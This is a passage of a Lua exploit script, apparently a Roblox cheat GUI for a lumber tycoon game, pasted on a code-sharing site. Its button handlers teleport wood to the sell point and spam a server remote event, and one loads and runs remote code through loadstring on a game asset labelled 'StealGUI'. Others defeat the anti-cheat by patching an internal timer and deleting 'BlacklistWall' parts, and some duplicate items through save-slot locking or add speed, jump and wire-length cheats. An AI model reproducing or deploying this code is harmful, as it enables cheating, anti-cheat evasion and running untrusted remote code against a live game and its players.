  3975. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  3976. if Plank.Owner.Value == game.Players.LocalPlayer then
  3977. for i,v in pairs(Plank:GetChildren()) do
  3978. if v.Name=="WoodSection" then
  3979. spawn(function()
  3980. for i=1,10 do
  3981. wait()
  3982. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  3983. end
  3984. end)
  3985. end
  3986. end
  3987. spawn(function()
  3988. for i=1,20 do
  3989. wait()
  3990. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank)
  3991. end
  3992. end)
  3993. end
  3994. end
  3995. end
  3996. end)
  3997.  
  3998. SellWood.MouseButton1Down:connect(function()
  3999. for _, Log in pairs(game.Workspace.LogModels:GetChildren()) do
  4000. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  4001. if Log.Owner.Value == game.Players.LocalPlayer then
  4002. for i,v in pairs(Log:GetChildren()) do
  4003. if v.Name=="WoodSection" then
  4004. spawn(function()
  4005. for i=1,10 do
  4006. wait()
  4007. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  4008. end
  4009. end)
  4010. end
  4011. end
  4012. spawn(function()
  4013. for i=1,20 do
  4014. wait()
  4015. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log)
  4016. end
  4017. end)
  4018. end
  4019. end
  4020. end
  4021. end)
  4022.  
  4023. StealGUI.MouseButton1Down:connect(function()
  4024. loadstring(game:GetObjects("rbxassetid://01925396229")[1].Source)()
  4025. end)
  4026.  
  4027. InfinityJump.MouseButton1Down:connect(function()
  4028. local Player = game:GetService'Players'.LocalPlayer;
  4029. local UIS = game:GetService'UserInputService';
  4030.  
  4031. _G.JumpHeight = 50;
  4032.  
  4033. function Action(Object, Function) if Object ~= nil then Function(Object); end end
  4034.  
  4035. UIS.InputBegan:connect(function(UserInput)
  4036. if UserInput.UserInputType == Enum.UserInputType.Keyboard and UserInput.KeyCode == Enum.KeyCode.Space then
  4037. Action(Player.Character.Humanoid, function(self)
  4038. if self:GetState() == Enum.HumanoidStateType.Jumping or self:GetState() == Enum.HumanoidStateType.Freefall then
  4039. Action(self.Parent.HumanoidRootPart, function(self)
  4040. self.Velocity = Vector3.new(0, _G.JumpHeight, 0);
  4041. end)
  4042. end
  4043. end)
  4044. end
  4045. end)
  4046. end)
  4047.  
  4048. AntiBL.MouseButton1Down:connect(function()
  4049. local plr = game.Players.LocalPlayer
  4050. local cframe
  4051.  
  4052. for i,v in next, workspace:GetDescendants() do
  4053. if v:IsA("SpawnLocation") then
  4054. v.Touched:Connect(function(h)
  4055. if h.Parent == plr.Character and cframe then
  4056. plr.Character:SetPrimaryPartCFrame(cframe)
  4057. end
  4058. end)
  4059. end
  4060. end
  4061.  
  4062. game:GetService("RunService"):BindToRenderStep("NO HACKS",Enum.RenderPriority.Last.Value,function()
  4063. if game.Players.LocalPlayer.Character.PrimaryPart then
  4064. cframe = game.Players.LocalPlayer.Character.PrimaryPart.CFrame
  4065. end
  4066. end)
  4067.  
  4068. for i,v in next, debug.getregistry() do
  4069. if type(v)=='function' and debug.getupvalues(v).lastUpdate then
  4070. debug.setupvalue(v,"lastUpdate",math.huge)
  4071. break
  4072. end
  4073. end
  4074.  
  4075. for i,v in next, workspace.Effects:GetChildren() do
  4076. if v:IsA("BasePart") and v.Name == "BlacklistWall" then
  4077. v:Destroy()
  4078. end
  4079. end
  4080. end)
  4081. Tpyourbase.MouseButton1Down:connect(function()
  4082. for i,v in pairs(game.Workspace.Properties:GetChildren()) do
  4083. if v.Owner.Value == game.Players.LocalPlayer then
  4084. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.OriginSquare.CFrame + Vector3.new(0,10,0)
  4085. end
  4086. end
  4087. end)
  4088.  
  4089. Dupe.MouseButton1Down:connect(function()
  4090. local plr = game:GetService("Players").LocalPlayer
  4091. local slot = plr.CurrentSaveSlot
  4092. if Option == false then
  4093. if slot.Value == -1 then
  4094. Option = true
  4095. slot.RobloxLocked = true
  4096. Dupe.BackgroundColor3 = Color3.new(0, 1, 0)
  4097. end
  4098. else
  4099. Option = false
  4100. slot.RobloxLocked = false
  4101. Dupe.BackgroundColor3 = Color3.new(0.7, 0, 0)
  4102. end
  4103. end)
  4104.  
  4105. SpeedQ.MouseButton1Down:connect(function()
  4106. local plr = game:GetService("Players").LocalPlayer
  4107. local char = plr.Character
  4108. local mouse = game:GetService("Players").LocalPlayer:GetMouse()
  4109. local hum = char:FindFirstChild("HumanoidRootPart")
  4110. local speed = 3
  4111. mouse.KeyDown:connect(function(key)
  4112. if key == "q" then
  4113. loop = true
  4114. while loop do
  4115. hum.CFrame = hum.CFrame + hum.CFrame.lookVector * speed
  4116. wait()
  4117. end
  4118. end
  4119. end)
  4120.  
  4121. mouse.KeyUp:connect(function(key)
  4122. if key == "q" then
  4123. loop = false
  4124. end
  4125. end)
  4126. end)
  4127.  
  4128. ModedWire.MouseButton1Down:connect(function()
  4129. for i,v in next,game.ReplicatedStorage.Purchasables.WireObjects:GetChildren() do
  4130. if v:FindFirstChild("Type") then
  4131. if v.Type.Value == "Wire" then
  4132. v.Type.Parent.OtherInfo.MaxLength.Value = 99999999
  4133. end
  4134. end
  4135. end
  4136. end)
  4137. end)
  4138.  
  4139. Credits.Name = "Credits"
  4140. Credits.Parent = Main
  4141. Credits.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255)
  4142. Credits.Position = UDim2.new(0.00262779323, 0, 0.904109597, 0)
  4143. Credits.Size = UDim2.new(0, 185, 0, 21)
  4144. Credits.Font = Enum.Font.Gotham
  4145. Credits.Text = "Made by vVengance"
  4146. Credits.TextColor3 = Color3.new(0.992157, 0.992157, 0.992157)
  4147. Credits.TextSize = 14
  4148. Credits.TextStrokeColor3 = Color3.new(1, 1, 1)
  4149. Credits.TextWrapped = true
  4150. -- Scripts:
Add Comment
Please, Sign In to add comment